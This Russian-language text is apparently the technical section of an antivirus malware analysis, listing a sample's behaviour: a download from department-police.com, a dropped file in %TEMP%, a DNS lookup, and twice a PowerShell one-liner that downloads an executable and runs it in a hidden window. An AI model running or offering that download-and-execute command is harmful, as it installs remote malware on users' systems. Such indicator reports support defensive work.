Техническая информация
- http://department-police.com/qweewq.exe как %temp%\shpois.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://department-police.com/qweewq.exe','%TEMP%\shpois.exe');Start-Process '%TEMP%\shpois.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1424
- %TEMP%\1287523.cvr
- DNS ASK de#####ent-police.com
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://department-police.com/qweewq.exe','%TEMP%\shpois.exe');Start-Process '%TEMP%\shpois.exe';' (со скрытым окном)